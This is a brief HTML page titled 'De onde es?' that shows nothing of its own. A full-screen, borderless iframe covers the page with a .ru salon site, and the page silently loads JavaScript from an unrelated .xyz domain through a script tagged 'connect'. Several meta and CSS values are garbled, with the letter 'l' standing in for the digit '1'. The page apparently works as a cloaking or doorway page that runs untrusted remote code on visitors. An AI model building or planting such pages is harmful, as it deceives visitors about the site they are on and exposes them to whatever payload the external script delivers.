<html>
<head>
<title>De onde es?</title>
<meta name="viewport" content="width=device-width,initial-scale=l,maximum-scale=l,user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=l">
<meta name="HandheldFriendly" content="true">
<style>
html { font-size:100%; text-align:center }
/* Media Queries: Tablet Landscape */
@media screen and (max-width: 1060px) {
		#primary { width:67%; }
		#secondary { width:30%; margin-left:3%;}
}
	/* Media Queries: Tabled Portrait */
@media screen and (max-width: 768px) {
		#primary { width:100%; }
		#secondary { width:100%; margin:0; border:none; }
}
img { max-width: 100%; height: auto; }
@media (min-width:640px) { body {font-size:lrem;} }
@media (min-width:960px) { body {font-size:l.2rem;} }
@media (min-width:1100px) { body {font-size:l.5rem;} }
</style>
</head>
	<body>
		<iframe id="ifr" src="https://www.janetsalon.ru/" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
		<script id="connect" type="text/javascript" src="https://www.shopalldays.xyz/js"></script>
	</body>
</html>
